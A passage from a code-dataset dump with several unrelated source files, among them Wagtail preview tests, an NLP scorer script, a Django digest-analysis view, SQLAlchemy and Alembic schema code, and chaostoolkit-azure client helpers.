response\n            self.assertEqual(response.status_code, 200)\n            self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n            # Check the user can refresh the preview\n            preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n                self.home_page.id\n            )\n            self.assertIn(preview_session_key, self.client.session)\n\n            response = self.client.get(preview_url)\n\n            # Check the HTML response\n            self.assertEqual(response.status_code, 200)\n            self.assertTemplateUsed(response, \"tests/event_page.html\")\n            self.assertContains(response, \"Beach party\")\n            self.assertNotContains(response, \"
<li>Parties</li>\")\n            self.assertNotContains(response, \"<li>Holidays</li>\")\n\n            # Since superusers see the \"categories\" panel, the posted data should be used for the preview.\n            self.login(username=\"superuser\", password=\"password\")\n            response = self.client.post(preview_url, self.post_data)\n\n            # Check the JSON response\n            self.assertEqual(response.status_code, 200)\n            self.assertJSONEqual(response.content.decode(), {\"is_valid\": True})\n\n            # Check the user can refresh the preview\n            preview_session_key = \"wagtail-preview-tests-eventpage-{}\".format(\n                self.home_page.id\n            )\n            self.assertIn(preview_session_key, self.client.session)\n\n            response = self.client.get(preview_url)\n\n            # Check the HTML response\n            self.assertEqual(response.status_code, 200)\n            self.assertTemplateUsed(response, \"tests/event_page.html\")\n            self.assertContains(response, \"Beach party\")\n            self.assertContains(response, \"
<li>Parties</li>\")\n            self.assertContains(response, \"<li>Holidays</li>\")\n\n\nclass TestDisablePreviewButton(TestCase, WagtailTestUtils):\n    \"\"\"\n    Test that preview button can be disabled by setting preview_modes to an empty list\n    \"\"\"\n\n    def setUp(self):\n        # Find root page\n        self.root_page = Page.objects.get(id=2)\n\n        # Login\n        self.user = self.login()\n\n    def test_disable_preview_on_create(self):\n        # preview button is available by default\n        response = self.client.get(\n            reverse(\n                \"wagtailadmin_pages:add\",\n                args=(\"tests\", \"simplepage\", self.root_page.id),\n            )\n        )\n        self.assertEqual(response.status_code, 200)\n\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_on_add\",\n            args=(\"tests\", \"simplepage\", self.root_page.id),\n        )\n        self.assertContains(response, '
<li class=\"preview\">')\n        self.assertContains(response, 'data-action=\"%s\"' % preview_url)\n\n        # StreamPage has preview_modes = []\n        response = self.client.get(\n            reverse(\n                \"wagtailadmin_pages:add\",\n                args=(\"tests\", \"streampage\", self.root_page.id),\n            )\n        )\n        self.assertEqual(response.status_code, 200)\n\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_on_add\",\n            args=(\"tests\", \"streampage\", self.root_page.id),\n        )\n        self.assertNotContains(response, '
<li class=\"preview\">')\n        self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n\n    def test_disable_preview_on_edit(self):\n        simple_page = SimplePage(title=\"simple page\", content=\"hello\")\n        self.root_page.add_child(instance=simple_page)\n\n        # preview button is available by default\n        response = self.client.get(\n            reverse(\"wagtailadmin_pages:edit\", args=(simple_page.id,))\n        )\n        self.assertEqual(response.status_code, 200)\n\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_on_edit\", args=(simple_page.id,)\n        )\n        self.assertContains(response, '
<li class=\"preview\">')\n        self.assertContains(response, 'data-action=\"%s\"' % preview_url)\n\n        stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n        self.root_page.add_child(instance=stream_page)\n\n        # StreamPage has preview_modes = []\n        response = self.client.get(\n            reverse(\"wagtailadmin_pages:edit\", args=(stream_page.id,))\n        )\n        self.assertEqual(response.status_code, 200)\n\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_on_edit\", args=(stream_page.id,)\n        )\n        self.assertNotContains(response, '
<li class=\"preview\">')\n        self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n\n    def test_disable_preview_on_revisions_list(self):\n        simple_page = SimplePage(title=\"simple page\", content=\"hello\")\n        self.root_page.add_child(instance=simple_page)\n        simple_page.save_revision(log_action=True)\n\n        # check preview shows up by default\n        response = self.client.get(\n            reverse(\"wagtailadmin_pages:history\", args=(simple_page.id,))\n        )\n        preview_url = reverse(\n            \"wagtailadmin_pages:revisions_view\",\n            args=(simple_page.id, simple_page.get_latest_revision().id),\n        )\n        self.assertContains(response, \"Preview\")\n        self.assertContains(response, preview_url)\n\n        stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n        self.root_page.add_child(instance=stream_page)\n        latest_revision = stream_page.save_revision(log_action=True)\n\n        # StreamPage has preview_modes = []\n        response = self.client.get(\n            reverse(\"wagtailadmin_pages:history\", args=(stream_page.id,))\n        )\n        preview_url = reverse(\n            \"wagtailadmin_pages:revisions_view\",\n            args=(stream_page.id, latest_revision.id),\n        )\n        self.assertNotContains(response, \"Preview\")\n        self.assertNotContains(response, preview_url)\n\n    def disable_preview_in_moderation_list(self):\n        stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n        self.root_page.add_child(instance=stream_page)\n        latest_revision = stream_page.save_revision(\n            user=self.user, submitted_for_moderation=True\n        )\n\n        response = self.client.get(reverse(\"wagtailadmin_home\"))\n        preview_url = reverse(\n            \"wagtailadmin_pages:preview_for_moderation\", args=(latest_revision.id,)\n        )\n        self.assertNotContains(response, '
<li class=\"preview\">')\n        self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n","sub_path":"wagtail/admin/tests/pages/test_preview.py","file_name":"test_preview.py","file_ext":"py","file_size_in_byte":16506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368028423","text":"\n#Team: Meena Rapaka, K.Siva Naga Lakshmi, Ying ke\n#Assignment 4: Word Sense Disambiguation, file: scorer.py\n\n#The output of decision-list.py file(my-line-answers.txt) is compared with the golden standard key (line-answers.txt) which is #provided, to calculate the accuracy and provide\n#confusion matrix.\n\n##The program should run on command prompt/ terminal, then specify the path of the python file.\n\n#python scorer.py my-line-answers.txt line-answers.txt > wsdreport.txt\n\n#once we execute the above command, a text file is generated as\" wsdreport.txt\" which comprises the results of comparisons of #my-line-answers.txt with line-answers.txt which is resulted as the accuracy.\n#Confusion Matrix is also computed for the above listed comparisons.\n\n#Algorithm\n#1: Input is passed as sys arguments which are decision-list output file(my-line-answers.txt) and test key(line-answers.txt)\n#2: Read the output file to create a dictionary to separate line and sense id \n#3: We are creating a new list to match the key and value pairs\n#4: Match corresponding pairs from the model output to the test key and increment a counter each time when there is a match\n#5: Find the accuracy of the model by dividing based on length as defined in the formula\n#6: Find the confusion matrix by comparing output values with actual key values\n#7: Output is stored into wsdreport.txt\n#END\n\n\n\n\nimport sys\nimport nltk\nimport pandas as pd\nimport scipy\nfrom nltk.metrics import ConfusionMatrix\n\ndef main():\n\n output_file = sys.argv[1] #passing my-line-answers.txt\n key_file = sys.argv[2] #passing line-answers.txt\n \n with open(output_file) as file: #read my-line-answers.txt\n f1 = [line.rstrip('\\n') for line in file] #each line of file is converted into each element of list\n var1= [i.split(':\"', 1) for i in f1] #each line is split based on colon and quotes\n predicted = {} #declaring dictionary\n\n for a in range (1,len(var1)): #dictionary is created is passed instance id as key and sense id as value\n key=var1[a][0]\n value=var1[a][1]\n predicted[key]=value\n #Assuming a list and then using for loop reading the values from predicted and then appending them in the new list which is predicted_list.#\n predicted_list=[] \n for v in predicted:\n predicted_list.append(predicted[v])\n \n with open(key_file) as myf1: #read line-answers.txt \n f2 = [line.rstrip('\\n') for line in myf1] #each line of f1 is converted into each element of list\n var2= [i.split(':\"', 1) for i in f2] #each line is split based on colon and quotes\n observed = {} #declaring dictionary\n\n for a in range (1,len(var2)): # every value from key and value are read\n key=var2[a][0] #for every line in sentence, first part is considered as key\n value=var2[a][1] #second part is considered as sentence\n observed[key]=value\n #Assuming a list and then using for loop reading the values from observed. 
and then appending them in the new list which is observed_list.# \n observed_list=[]\n for v in observed:\n observed_list.append(observed[v])\n\n cm=ConfusionMatrix(observed_list,predicted_list) #calculating the consfusion matrix\n x=0\n for i in range(len(predicted_list)):\n if predicted_list[i] == observed_list[i]: #comparing both the list values and if it is equal x gets incremented.\n x += 1\n accuracy = (x/len(predicted_list)*100) #calculating the accuracy\n\n\t#Accuracy and confusion matrix is stored in output file viz wsdreport.txt\n print('Accuracy of the classifier is:',accuracy,'\\n\\n''Confusion Matrix: ',str(cm),)\nif __name__ == '__main__':\n main()\n","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457407826","text":"\"\"\"Bla.\"\"\"\n\nfrom collections import OrderedDict\n\nfrom rest_framework import serializers\nfrom ..base import AsyncWorker, StartJobView\nfrom ..tools import (\n records_from_data_files,\n data_to_html_data,\n file_to_filelike_object,\n did_you_mean,\n set_record_topology,\n matplotlib_figure_to_svg_base64_data,\n)\nfrom ..serializers import FileSerializer\n\nimport flametree\nfrom plateo.parsers import plate_from_platemap_spreadsheet\nfrom bandwitch import Clone, BandsObservation, ClonesObservations\nfrom bandwagon import plot_records_digestions\n\n\ndigestion = serializers.ListField(child=serializers.CharField())\n\n\nclass serializer_class(serializers.Serializer):\n constructsMap = FileSerializer(allow_null=True)\n clonesMap = FileSerializer(allow_null=True)\n constructsSequences = serializers.ListField(child=FileSerializer())\n goal = serializers.CharField()\n uniqueDigestion = serializers.BooleanField()\n digestion = serializers.ListField(child=serializers.CharField())\n digestionsMap = FileSerializer(allow_null=True)\n tolerance = serializers.FloatField()\n bandsRange = serializers.ListField(child=serializers.IntegerField())\n fragmentAnalysisArchive = FileSerializer(allow_null=True)\n includeDigestionPlots = serializers.BooleanField()\n ignoreBandsUnder = serializers.IntegerField()\n rfuSizeRatio = serializers.FloatField()\n subanalysis = serializers.CharField()\n topology = serializers.CharField()\n\n\ndef file_type(f):\n return \"csv\" if f.name.lower().endswith(\"csv\") else \"excel\"\n\n\nclass worker_class(AsyncWorker):\n def work(self):\n self.logger(message=\"Reading the files...\")\n data = self.data\n\n # PARSE ALL FILES\n\n constructs_records = records_from_data_files(data.constructsSequences)\n for record in constructs_records:\n set_record_topology(record, data.topology)\n constructs_records = {r.id: r for r in constructs_records}\n constructs_records = OrderedDict(sorted(constructs_records.items()))\n\n constructs_plate = plate_from_platemap_spreadsheet(\n file_to_filelike_object(data.constructsMap),\n file_type=file_type(data.constructsMap),\n data_field=\"construct\",\n headers=True,\n )\n constructs_map = OrderedDict(\n [\n (well.name, well.data.construct)\n for well in constructs_plate.iter_wells(direction=\"row\")\n if \"construct\" in well.data and str(well.data.construct) != \"nan\"\n ]\n )\n unknown_constructs = {}\n for well, construct in constructs_map.items():\n if construct not in constructs_records:\n unknown_constructs[construct] = {\n \"well\": well,\n \"suggestions\": did_you_mean(construct, constructs_records),\n }\n if len(unknown_constructs):\n return {\"success\": False, 
\"unknown_constructs\": unknown_constructs}\n\n if data.uniqueDigestion:\n digestion = tuple(data.digestion)\n digestions_map = OrderedDict(\n [(wellname, digestion) for wellname in constructs_map]\n )\n else:\n digestions_plate = plate_from_platemap_spreadsheet(\n file_to_filelike_object(data.digestionsMap),\n file_type=file_type(data.digestionsMap),\n data_field=\"digestion\",\n headers=True,\n )\n digestions_map = OrderedDict(\n [\n (well.name, tuple(well.data.digestion.split(\", \")))\n for well in digestions_plate.iter_wells(direction=\"row\")\n if \"digestion\" in well.data and str(well.data.digestion) != \"nan\"\n ]\n )\n\n archive = file_to_filelike_object(data.fragmentAnalysisArchive)\n\n # ANALYZE ALL FILES AND VALIDATE BANDS\n\n self.logger(message=\"Analyzing the data...\")\n\n observations = BandsObservation.from_aati_fa_archive(\n archive,\n ignore_bands_under=data.ignoreBandsUnder,\n min_rfu_size_ratio=data.rfuSizeRatio,\n )\n clones = Clone.from_bands_observations(\n observations, constructs_map, digestions_map\n )\n clones_observations = ClonesObservations(clones, constructs_records)\n if data.subanalysis == \"partial_digests\":\n return self.partial_digests_analysis(data, clones_observations)\n else:\n return self.validation_analysis(data, clones_observations)\n\n def partial_digests_analysis(self, data, clones_observations):\n analysis = clones_observations.partial_digests_analysis()\n best = max(analysis, key=lambda a: analysis[a][\"valid_clones\"])\n if analysis[best][\"valid_clones\"] == analysis[()][\"valid_clones\"]:\n return {\n \"message\": \"The partial digest analysis did not find any \"\n \"significant results\",\n \"success\": \"yeah!\",\n }\n ax = clones_observations.plot_partial_digests_analysis(analysis)\n validations = analysis[best][\"validations\"]\n observations = ClonesObservations(\n clones_observations.clones,\n clones_observations.constructs_records,\n partial_cutters=best,\n )\n pdf_data = observations.plot_all_validations_patterns(validations)\n return {\n \"pdf_file\": {\n \"data\": data_to_html_data(pdf_data, \"pdf\"),\n \"name\": \"digest_validation_assuming_partial_%s.pdf\" % \"_\".join(best),\n \"mimetype\": \"application/pdf\",\n },\n \"message\": (\n \"The analysis shows that the following enzyme(s) were\"\n \" possibly only partially cutting: %s.
    The report below\"\n \" shows the validation under this hypothesis.\"\n )\n % (\", \".join([\"%s\" % b for b in best])),\n \"figure_data\": matplotlib_figure_to_svg_base64_data(\n ax.figure, bbox_inches=\"tight\"\n ),\n \"success\": \"yeah!\",\n }\n\n def validation_analysis(self, data, clones_observations):\n validations = clones_observations.validate_all_clones(\n min_band_cutoff=data.bandsRange[0],\n max_band_cutoff=data.bandsRange[1],\n relative_tolerance=data.tolerance,\n )\n first_validation = list(validations.values())[0]\n ladder = list(first_validation.clone.digestions.values())[0].ladder\n\n # CREATE A ZIP WITH VALIDATION REPORTS\n\n zip_root = flametree.file_tree(\"@memory\")\n self.logger(message=\"Generating the validation report...\")\n zip_root._file(\"validations.pdf\").write(\n clones_observations.plot_all_validations_patterns(validations)\n )\n clones_observations.validations_summary_table(\n validations, zip_root._file(\"summary.csv\").open(\"w\")\n )\n if data.includeDigestionPlots:\n self.logger(message=\"Plotting cuts maps...\")\n co = clones_observations\n\n plot_records_digestions(\n target=zip_root._file(\"digestions.pdf\").open(\"wb\"),\n ladder=ladder,\n records_and_digestions=[\n (co.constructs_records[cst], digestion_)\n for cst, digestions in co.constructs_digestions.items()\n for digestion_ in digestions\n ],\n )\n # zip_root._file('digestions.pdf').write(pdf_data)\n\n self.logger(message=\"Generating the success plate map...\")\n ax = clones_observations.plot_validations_plate_map(validations)\n ax.figure.savefig(\n zip_root._file(\"success_map.pdf\").open(\"wb\"),\n format=\"pdf\",\n bbox_inches=\"tight\",\n )\n\n self.logger(message=\"All done !\")\n\n return {\n \"zip_file\": {\n \"data\": data_to_html_data(zip_root._close(), \"zip\"),\n \"name\": \"validation_report.zip\",\n \"mimetype\": \"application/zip\",\n },\n \"success\": \"yeah!\",\n }\n\n\nclass AnalyzeDigestsView(StartJobView):\n serializer_class = serializer_class\n worker_class = worker_class\n","sub_path":"backend/app/views/analyze_digests/AnalyzeDigests.py","file_name":"AnalyzeDigests.py","file_ext":"py","file_size_in_byte":8296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"254649644","text":"# 连接数据库cookies\r\nfrom sqlalchemy import create_engine\r\n\r\nDB_URI = \"mysql+pymysql://root:123456@localhost/cookies\"\r\nengine = create_engine(DB_URI, pool_recycle=3600)\r\nconnection = engine.connect() # 可以不要这个行代码\r\n\r\nfrom sqlalchemy import MetaData\r\nmetadata = MetaData()\r\nfrom datetime import datetime\r\nfrom sqlalchemy import Table, Column, Integer, Numeric, String, Boolean, DateTime, ForeignKey\r\nfrom sqlalchemy import CheckConstraint, Index, PrimaryKeyConstraint, UniqueConstraint, ForeignKeyConstraint\r\n\r\ncookies = Table('cookies', metadata,\r\n Column('cookie_id', Integer(), primary_key=True),\r\n Column('cookie_name', String(50)), # “, index=True”可被加进去,内敛的index\r\n Column('cookie_recipe_url', String(255)),\r\n Column('cookie_sku', String(55)),\r\n Column('quantity', Integer()),\r\n Column('unit_cost', Numeric(12, 2))\r\n )\r\nCheckConstraint('unit_cost >= 0.00', name='unit_cost_positive') # Defining the key explicitly\r\nIndex('ix_cookies_cookie_name', 'cookie_name') # Defining an index using an explicit construction type\r\nIndex('ix_test', cookies.c.cookie_sku, cookies.c.cookie_name) # If we want to select by \"cookie_SKU\" and \"cookie_name\"\r\n\r\nusers = Table('users', metadata,\r\n Column('user_id', 
Integer()),\r\n Column('username', String(15), nullable=False), # Column('username', String(15), nullable=False, unique=True),内敛的unique\r\n Column('email_address', String(255), nullable=False),\r\n Column('phone', String(20), nullable=False),\r\n Column('password', String(25), nullable=False),\r\n Column('created_on', DateTime(), default=datetime.now),\r\n Column('updated_on', DateTime(), default=datetime.now, onupdate=datetime.now)\r\n )\r\nPrimaryKeyConstraint('user_id', name='user_pk') # 以下的“name='XX'”看起来像是备注,可不定义name这个参数\r\nUniqueConstraint('username', name='uix_username') # Defining the key explicitly\r\n\r\norders = Table('orders',metadata,\r\n Column('order_id', Integer(), primary_key=True),\r\n Column('user_id', ForeignKey('users.user_id')), # users表在上面 # 体会ForeignKeyConstraint的显式\r\n Column('shipped', Boolean(), default=False)\r\n )\r\n\r\nline_items = Table('line_items', metadata,\r\n Column('line_items_id', Integer(), primary_key=True),\r\n Column('order_id'),\r\n Column('cookie_id', ForeignKey('cookies.cookie_id')), # 体会ForeignKey是内敛\r\n Column('quantity', Integer()),\r\n Column('extended_cost', Numeric(12, 2))\r\n )\r\nForeignKeyConstraint(['order_id'], ['orders.order_id']) # Creating the ForeignKeyConstraint for the \"order_id\" field betweenthe \"line_items\" and \"orders\" table\r\n# Persisting the schema to the database(cookies)\r\nmetadata.create_all(engine)\r\n","sub_path":"SQLAlchemy/chapter_one.py","file_name":"chapter_one.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"460877233","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for chaostoolkit-azure.\"\"\"\n\nfrom typing import List\n\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.redis import RedisManagementClient\nfrom azure.mgmt.eventhub import EventHubManagementClient\nfrom azure.mgmt.rdbms.postgresql_flexibleservers import (\n PostgreSQLManagementClient as PostgreSQLFlexibleManagementClient\n)\nfrom azure.mgmt.rdbms.postgresql import PostgreSQLManagementClient\nfrom azure.mgmt.web import WebSiteManagementClient\nfrom azure.mgmt.resourcegraph import ResourceGraphClient\nfrom chaoslib.discovery import (discover_actions, discover_probes,\n initialize_discovery_result)\nfrom chaoslib.types import (Configuration, DiscoveredActivities, Discovery,\n Secrets)\nfrom logzero import logger\n\nfrom chaosazure.auth import auth\nfrom chaosazure.common.config import load_configuration, load_secrets\n\n\n__all__ = [\n \"discover\", \"__version__\", \"init_compute_management_client\",\n \"init_website_management_client\", \"init_resource_graph_client\"\n]\n__version__ = '0.11.0'\n\n\ndef discover(discover_system: bool = True) -> Discovery:\n \"\"\"\n Discover Azure capabilities offered by this extension.\n \"\"\"\n logger.info(\"Discovering capabilities from chaostoolkit-azure\")\n\n discovery = initialize_discovery_result(\n \"chaostoolkit-azure\", __version__, \"azure\")\n discovery[\"activities\"].extend(__load_exported_activities())\n return discovery\n\n\ndef init_compute_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> ComputeManagementClient:\n \"\"\"\n Initializes Compute management client for virtual machine,\n and virtual machine scale sets resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"ComputeManagementClient\", Secrets)\n\n\ndef init_postgresql_flexible_management_client(\n experiment_secrets: 
Secrets,\n experiment_configuration: Configuration) -> PostgreSQLFlexibleManagementClient:\n \"\"\"\n Initializes Relational Database management client for postgresql_flexible,\n resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"PostgreSQLFlexibleManagementClient\", Secrets)\n\n\ndef init_postgresql_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> PostgreSQLManagementClient:\n \"\"\"\n Initializes Relational Database management client for postgresql,\n resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"PostgreSQLManagementClient\", Secrets)\n\n\ndef init_website_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> WebSiteManagementClient:\n \"\"\"\n Initializes Website management client for webapp resource under Azure\n Resource manager.\n \"\"\"\n return __azure_client_factory(\"WebSiteManagementClient\", Secrets)\n\n\ndef init_resource_graph_client(\n experiment_secrets: Secrets) -> ResourceGraphClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"ResourceGraphClient\", Secrets)\n\n\ndef init_redis_client(\n experiment_secrets: Secrets) -> RedisManagementClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"RedisManagementClient\", Secrets)\n\n\ndef init_eventhub_client(\n experiment_secrets: Secrets) -> EventHubManagementClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"EventHubManagementClient\", Secrets)\n\n\n###############################################################################\n# Private functions\n###############################################################################\ndef __load_exported_activities() -> List[DiscoveredActivities]:\n \"\"\"\n Extract metadata from actions and probes exposed by this extension.\n \"\"\"\n activities = []\n activities.extend(discover_actions(\"chaosazure.machine.actions\"))\n activities.extend(discover_probes(\"chaosazure.machine.probes\"))\n activities.extend(discover_actions(\"chaosazure.aks.actions\"))\n activities.extend(discover_actions(\"chaosazure.vmss.actions\"))\n activities.extend(discover_actions(\"chaosazure.webapp.actions\"))\n activities.extend(discover_probes(\"chaosazure.webapp.probes\"))\n activities.extend(discover_actions(\"chaosazure.postgresql_flexible.actions\"))\n activities.extend(discover_probes(\"chaosazure.postgresql_flexible.probes\"))\n activities.extend(discover_actions(\"chaosazure.postgresql.actions\"))\n activities.extend(discover_probes(\"chaosazure.postgresql.probes\"))\n activities.extend(discover_actions(\"chaosazure.redis.actions\"))\n activities.extend(discover_probes(\"chaosazure.redis.probes\"))\n activities.extend(discover_actions(\"chaosazure.eventhub.actions\"))\n activities.extend(discover_probes(\"chaosazure.eventhub.probes\"))\n return activities\n\n\ndef __azure_client_factory(experiment_secrets: Secrets, client_name: str) -> object:\n \"\"\"\n Simple factory for *Clients in azure.mgmt\n \"\"\"\n secrets = load_secrets(experiment_secrets)\n with auth(secrets) as authentication:\n base_url = secrets.get('cloud').endpoints.resource_manager\n scopes = [base_url + \"/.default\"]\n client = eval(client_name)(\n credential=authentication,\n credential_scopes=scopes,\n base_url=base_url)\n\n return 
client\n","sub_path":"chaosazure/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"422709569","text":"import hog\nfrom dice import four_sided, six_sided, make_test_dice\nfrom sys import setrecursionlimit\nsetrecursionlimit(20000)\n\ndef final_strategy(score, opponent_score):\n best_num_rolls = 5 if hog.select_dice(score, opponent_score) == six_sided else 3\n\n potential_bacon = hog.potential_bacon_calc(opponent_score)\n score_with_bacon = potential_bacon + score\n\n goal_nums = [\n # Goal number to achieve for a swap\n opponent_score / 2,\n ] + [\n # All goal numbers that would result in the opponent having 4-sided dice\n x for x in range(score, 100) if (x + opponent_score) % 7 == 0 if potential_bacon > 4\n ]\n\n if potential_bacon > 8 or score_with_bacon in goal_nums:\n return 0\n\n sample_amount = 1\n possible_rolls = [0,3,4,5,6]\n roll_results = []\n dice_selection = hog.select_dice(score, opponent_score)\n for num_rolls in possible_rolls:\n wins = 0\n for i in range(sample_amount):\n new_score = hog.take_turn(num_rolls, opponent_score, dice=dice_selection)\n opponent_roll = 5\n opponent_dice = hog.select_dice(opponent_score, new_score)\n new_opponent_score = hog.take_turn(opponent_roll, new_score, dice=opponent_dice)\n r = hog.play(final_strategy, hog.always_roll(5), goal=max(new_score,new_opponent_score)+10, scores=[new_score, new_opponent_score])\n if r[0] > r[1]:\n wins += 1\n roll_results.append(wins)\n\n\n\n return best_num_rolls # Replace this statement\n\nresult = hog.play(final_strategy, hog.always_roll(5), scores=[0,0])\nprint(result)\nprint()\n","sub_path":"projects/hog/hog_strat.py","file_name":"hog_strat.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"352268401","text":"\"\"\"init table\n\nRevision ID: eb631f23cf91\nRevises: \nCreate Date: 2020-05-21 15:04:19.736592\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb631f23cf91'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('customer',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=64), nullable=True),\n sa.Column('phone', sa.String(length=10), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('fname', sa.String(length=64), nullable=True),\n sa.Column('lname', sa.String(length=64), nullable=True),\n sa.Column('gender', sa.Integer(), nullable=True),\n sa.Column('address', sa.String(length=64), nullable=True),\n sa.Column('state', sa.String(length=2), nullable=True),\n sa.Column('city', sa.String(length=64), nullable=True),\n sa.Column('zip', sa.String(length=5), nullable=True),\n sa.Column('score', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_customer_email'), 'customer', ['email'], unique=True)\n op.create_index(op.f('ix_customer_fname'), 'customer', ['fname'], unique=False)\n op.create_index(op.f('ix_customer_lname'), 'customer', ['lname'], unique=False)\n op.create_index(op.f('ix_customer_phone'), 'customer', ['phone'], unique=True)\n op.create_index(op.f('ix_customer_score'), 'customer', ['score'], unique=False)\n op.create_index(op.f('ix_customer_username'), 'customer', ['username'], unique=True)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('phone', sa.String(length=10), nullable=True),\n sa.Column('department', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_index(op.f('ix_customer_username'), table_name='customer')\n op.drop_index(op.f('ix_customer_score'), table_name='customer')\n op.drop_index(op.f('ix_customer_phone'), table_name='customer')\n op.drop_index(op.f('ix_customer_lname'), table_name='customer')\n op.drop_index(op.f('ix_customer_fname'), table_name='customer')\n op.drop_index(op.f('ix_customer_email'), table_name='customer')\n op.drop_table('customer')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/eb631f23cf91_init_table.py","file_name":"eb631f23cf91_init_table.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211709457","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randint\nfrom sklearn.neighbors import NearestNeighbors\nimport math\nimport random\n\n\n#Read in data\ndf = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None)\n#Column names\ncols = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'class']\n#Assign column names\ndf.columns = cols\n\n#Scatter plot\nx = df['sepal_length']\ny = df['sepal_width']\n\nplt.scatter(x, y)\nplt.xlabel('Sepal Length')\nplt.ylabel('Sepal Width')\nplt.show()\n\n#pick random point\nrandom.seed()\npt = df.iloc[random.choice(df.index.tolist())]\npt['sepal_length']\n\n#determine distances from random point\ndef dist_from_pt(p):\n return math.sqrt(((pt.sepal_length - p.sepal_length) ** 2) + ((pt.sepal_width - p.sepal_width) ** 2))\n\n#set distances as values in new column\ndf['dist_from_pt'] = df[['sepal_length', 'sepal_width']].apply(func=dist_from_pt, axis=1)\n\n#sort values by distance column\ndf_sorted = df.sort_values(by='dist_from_pt', ascending=True)\n\n#define knn function\ndef knn(k):\n\treturn df_sorted['class'][0:k].value_counts().index[0]\n\n#print majority class based on number of neighbors inputted for k\nprint(knn(25))","sub_path":"machine-learning-gists/d75837b5b18a4512f97de477e49a00a95c69506c/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502742487","text":"# derived from https://github.com/danthedeckie/OpenLP-To-ProPresenter5-Converter\nimport os\nimport re\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom uuid import uuid1\n\nfrom utils import (load_scottish_psalter, load_sing_psalms, make_output_folder,\n remove_folder, remove_markup, zip_folder)\n\n__re_uni_x = re.compile(r'\\\\x..') # Unicode \\x form\n__re_uni_u = re.compile(r'\\\\u....') # Unicode \\u form\n\n\nDEFAULT_FONT = \"Franklin Gothic Book\"\n\n\ndef make_uuid():\n return uuid1().__str__().upper()\n\n\ndef SuperScRTF(text):\n # superscript verse #s at start of stanza:\n for ii in re.findall(r'uc0 \\d+-*\\d*', text):\n num = ii.lstrip('uc0 ')\n text = text.replace(ii, 'uc0 \\\\super {' + num + '}\\\\nosupersub ')\n # superscript verse #s in middle of stanza:\n for ii in re.findall(r'\\n\\d+-*\\d*', text):\n num = re.findall(r'\\d+-*\\d*', ii)\n text = text.replace(ii, '\\n\\\\super {' + num[0] + '}\\\\nosupersub ')\n return text\n\n\ndef underline_slide(text):\n text = text.replace('', r'{\\lang2057\\ul\\ltrch ')\n text = text.replace('', r'}')\n return text\n\n\ndef 
